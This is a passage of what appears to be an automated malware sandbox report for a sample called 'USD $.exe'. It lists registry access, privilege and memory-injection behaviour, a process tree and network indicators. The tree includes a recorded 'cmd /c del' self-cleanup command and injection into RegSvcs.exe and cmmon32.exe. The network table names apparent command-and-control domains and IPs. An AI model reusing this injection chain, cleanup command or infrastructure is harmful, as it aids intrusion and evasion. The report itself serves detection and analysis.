| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.optimalgafa.com | udp |
| US | 8.8.8.8:53 | www.telecompink.com | udp |
| US | 8.8.8.8:53 | www.wingsstyling.info | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.donjrisdumb.com | udp |
| US | 8.8.8.8:53 | www.sdmdwang.com | udp |
| US | 8.8.8.8:53 | www.lovertons.com | udp |
| US | 8.8.8.8:53 | www.directpractice.pro | udp |
| DE | 91.195.240.19:80 | www.directpractice.pro | tcp |
| US | 8.8.8.8:53 | 19.240.195.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.theessentialstore.net | udp |
| US | 8.8.8.8:53 | www.rcheapwdbuy.com | udp |
| US | 8.8.8.8:53 | www.wiloasbanhsgtarewdasc.solutions | udp |
| US | 8.8.8.8:53 | www.cloverhillconsultants.com | udp |
| US | 15.197.142.173:80 | www.cloverhillconsultants.com | tcp |
| US | 8.8.8.8:53 | 173.142.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.panyu-qqbaby.com | udp |
| US | 172.65.190.172:80 | www.panyu-qqbaby.com | tcp |
| US | 8.8.8.8:53 | 172.190.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.tgeuuy.cool | udp |
Files
memory/3224-0-0x00000000744AE000-0x00000000744AF000-memory.dmp
memory/3224-1-0x0000000000DE0000-0x0000000000EE6000-memory.dmp
memory/3224-2-0x00000000082B0000-0x0000000008854000-memory.dmp
memory/3224-3-0x0000000007DA0000-0x0000000007E32000-memory.dmp
memory/3224-4-0x00000000744A0000-0x0000000074C50000-memory.dmp
memory/3224-5-0x0000000003300000-0x000000000330A000-memory.dmp
memory/3224-6-0x0000000005A20000-0x0000000005ABC000-memory.dmp
memory/3224-7-0x0000000005990000-0x0000000005998000-memory.dmp
memory/3224-8-0x00000000744AE000-0x00000000744AF000-memory.dmp
memory/3224-9-0x00000000744A0000-0x0000000074C50000-memory.dmp
memory/3224-10-0x0000000005E00000-0x0000000005E8C000-memory.dmp
memory/3224-11-0x00000000058A0000-0x00000000058DA000-memory.dmp
memory/1932-12-0x0000000000400000-0x0000000000428000-memory.dmp
memory/3224-14-0x00000000744A0000-0x0000000074C50000-memory.dmp
memory/1932-15-0x0000000001220000-0x000000000156A000-memory.dmp
memory/1932-18-0x0000000000DD0000-0x0000000000DE0000-memory.dmp
memory/1932-17-0x0000000000400000-0x0000000000428000-memory.dmp
memory/3488-19-0x0000000003130000-0x00000000031FB000-memory.dmp
memory/3488-23-0x0000000008610000-0x000000000873E000-memory.dmp
memory/1932-22-0x0000000002F30000-0x0000000002F40000-memory.dmp
memory/1932-21-0x0000000000400000-0x0000000000428000-memory.dmp
memory/3488-24-0x0000000003130000-0x00000000031FB000-memory.dmp
memory/4936-26-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/4936-25-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/3488-27-0x0000000008610000-0x000000000873E000-memory.dmp
memory/4936-28-0x0000000000130000-0x0000000000158000-memory.dmp
memory/3488-31-0x0000000008080000-0x0000000008130000-memory.dmp
memory/3488-32-0x0000000008080000-0x0000000008130000-memory.dmp
memory/3488-34-0x0000000008080000-0x0000000008130000-memory.dmp